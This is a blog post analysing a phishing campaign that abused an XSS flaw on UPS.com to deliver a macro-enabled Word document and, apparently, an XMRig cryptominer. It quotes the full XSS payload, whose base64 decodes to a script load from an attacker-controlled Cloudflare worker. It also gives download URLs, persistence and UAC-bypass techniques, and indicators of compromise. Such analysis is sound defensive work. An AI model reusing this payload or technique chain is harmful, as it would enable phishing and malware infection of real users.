Let's talk about one of the most creative phishing campaigns I have ever seen to date. In attacker jargon, this sequenced fence hopping is known as building a full exploit chain: Combining multiple vulnerabilities into a chain of attack that ends with the attacker in a privileged position on the targeted system.

Malware Picture

Since Covid19 began, the deliveries have surged drastically. Either for grocery shopping or something you have ordered, we all receive many parcels from various couriers. It is more common than before to receive text or e-mail notifications regarding status updates for your delivery. This could turn out badly with high chances of being Phished especially if you are already waiting on a delivery.

This phishing campaign is the most realistic because it leveraged a Cross-Site Scripting (XSS) vulnerability that existed in one of the courier's websites (UPS). In this case, this has enabled attackers to modify the page contents and turning it into a legitimate download page by injecting malicious HTML and JavaScript code.

This vulnerability allowed the attacker to distribute a weaponised document (docm) through a remote CloudFlare worker but make it appear as though it was being downloaded directly from UPS.com.

When the document is downloaded and enabled, the macros will attempt to retrieve the next payload hosted on a 2ne domain controlled by the threat actor. At this stage it is uncertain what the final payload is supposed to do. The sky is the limit - Ransomware? Spyware? Botnet? We'll see.

The phishing campaign was first discovered on Aug 23, 2021, by security research Daniel Gallagher.

Dissecting the UPS phishing scam

Screenshots of the e-mail:

This is a decent attempt 1:1 for the template! No spelling mistakes or weird hidden Click here URLs. Going back to my title and explain why I said "Almost". This is because the email senders were not very convincing however good enough to pass SPF and DKIM protection, moreover because it leveraged XSS it did not break TLS validation: [email protected] As per Daniel's screenshots, however, I found another attempt coming from [email protected]. The email sender is always the same one "unitedparcelservice" and the domains were random, safe to assume since both are using WordPress as the main content management system and perhaps were using weak passwords or out of date build/plugins they were hacked and that allowed the attacker to send bulk e-mails from their servers.
The tracking number is the vulnerable XSS URL on UPS.com website. This downloads a malicious document, pretending to be an invoice.
Let's have a look at the URL in question.

The email headers:

Sending address: unitedparcelservice @ paradanta[.]com
SMTP server: 212.227.126[.]134 / mout.kundenserver[.]de

Email Headers unitedparcelservice@paradanta.com
Email Headers [email protected]

Url Encoded:

Url Decoded:
https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&service=standard_delivery&xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==&loc=en_US"><img src="x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

Tidying up more:
https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&service=standard_delivery&xref=useless&loc=en_US"><img src="x" onerror="Function(atob('$.getScript('https://m.media-amazon.workers.dev/js')'))()

Another base64 encoded string in the xref parameter that decodes to: 1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;).

Super interesting, the threat actor was kind and left a comment in the base64 string that explains this string's purpose, which is to hide the query parameter that is appended at the end of the URL. Because the URL is so long the browsers will not show all of the URL and since the malicious XSS injection is at the end of the URL we can't see it.

XSS payload is executed right after the loc parameter and is: <img src="x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

And yet another base64 string that decodes to $.getScript('https://m.media-amazon.workers.dev/js') this is the worker script that gets loaded in the page UPS page. <img src> XSS payload is quite common so nothing fancy there, atob() function decodes a string of data that has been encoded using Base64 encoding. This function is commonly used to steal cookies, bypass black-lists and typically for blind XSS injections.

CloudFlare Worker Script
CloudFlare Worker Script

The above script will modify the UPS page to display a message that a file will be downloaded.

UPS XSS Dowloading
UPS XSS Dowloading

This approach is truly what makes this campaign stand out. Victims of this campaign might be tricked in opening the invoice with less suspicion, thinking it is a genuine file from UPS.

The mysterious fake 'Invoice' document

From the above worker script, there is another URL in the parameter named downloadUrl, this was available at https://m.media-amazon.workers[.]dev/documents/invoice_1Z7301XR1412220178

Malicious Phishing Document
Malicious Phishing Document

The downloaded document is named 'invoice_1Z7301XR1412220178.docm' and claims to be a shipping invoice from UPS. Attention to the extension '.docm'. The macro names were "Hehehe" and "hahahah".

Phishing Document Macros
Phishing Document Macros

DOCM files are Microsoft Word 2007 or higher generated documents with the ability to run macros. It is similar to the DOCX file format but the ability to run macros makes it different from DOCX. Like DOCX, DOCM files can be store text, images, tables, shapes, charts and other contents. The capability to run macros make it easy to save time by executing the series of commands in the form of recorded actions for the automatic completion of a task. DOCM files can be opened and edited in Microsoft Word 2007 and above.

Once enabled, the macros within the document will attempt to download another file that was located at https://divine-bar-3d75.visual-candy.workers[.]dev/blackhole.png.

This appears to be an image file, but is it?
This file was disguised as a picture (png format) and it's the first payload to be downloaded. It is very common for advanced threat actors to split their payloads in smaller chunks to avoid downloading large files, they also use random timeouts between downloading and execution of these scripts. This helps in avoiding detection by antiviruses. Typically you see an obfuscated PowerShell script that retrieves more files that make up to a final payload.

After some more digging, I stumbled on another CloudFlare domain that hosts more instructions to be executed on the victim's machine This was available at: https://cdn.globalsigncdn.workers[.]dev

This sample contains so many TTPs: - Normal.dotm (persistence) - Run key to launch Normal.dotm via PS (persistence) by winword - Task scheduler to launch PS by winword - WMI Persistence, COM hijack and UAC bypass via SilentCleanup task. The final payloads "appears" to be linked to xmrig and its purpose is used for Cryptojacking.

Cryptojacking is a slow and tedious way to generate illicit income, that’s why the actor is using botnet to infect as many devices as possible. Owning multiple systems for mining is not cheap, so attackers try the next best thing: To remotely compromise devices and use them for mining instead.

XMRig is a miner specifically, a type of threat used to make money at the expense of computer users by using the infected computer users to mine Monero, a cryptocurrency. XMRig can cause a computer to overheat and perform badly. Since XMRig uses additional system resources, taking these away from the victim.

Final Payload.
Final Payload

We can see they are using RandomX algorithm.

RandomX is the name of the new mining algorithm for Monero, the privacy coin whose objective is to keep the network protected from ASIC mining, allowing only mining per CPU.


This phishing campaign illustrates the creativity and evolving techniques used by threat actors to distribute weaponised files convincingly.

While the E-Mail sender was a suspicious domain, the XSS vulnerability was actively exploited to make to appear as invoiced were legitimately downloaded from UPS, many people would have fallen for this scam. But did they?

That's a story for another article, perhaps if I can find where the mining workers are connecting and monitor that mining pool, I could come back with some statistics e.g. infection rate, money generated, time frame for this campaign. Game on!

I don't believe this to be APT gang however the chaining of vulnerabilities from an offensive security perspective was pretty ingenious.

I will continue digging for more information to find the source of this attack, if I find anything new I will update my blog post.
The UPS.com Cross-Site Scripting vulnerability has since been fixed.

Hash1: 841e6458ddc277a1ffdec7907b3e0be029dbe57af88fb11fcceb23f988cf7432

Hash2: ae1123c24bb52dce5ec0f0a6c947785012702dc7c3339188baee917721351ff5

Main hosts: cdn.globalsigncdn.workers[.]dev


Virus Total Scan

INVOICE_1Z7301XR1412220178.docm (MD5: 8EC2C162D57A426A32E27745D9854F93) - Interactive analysis - ANY.RUN
Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.
AnyRun Interactive analysis of infected document
divine-bar-3d75.visual-candy.workers.dev - urlscan.io
urlscan.io - Website scanner for suspicious and malicious URLs
Suspicious URL Analysis

Have you got any suggestions or questions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

You've successfully subscribed to Flaviu Popescu
Welcome back! You've successfully signed in.
Great! You've successfully signed up.
Success! Your account is fully activated, you now have access to all content.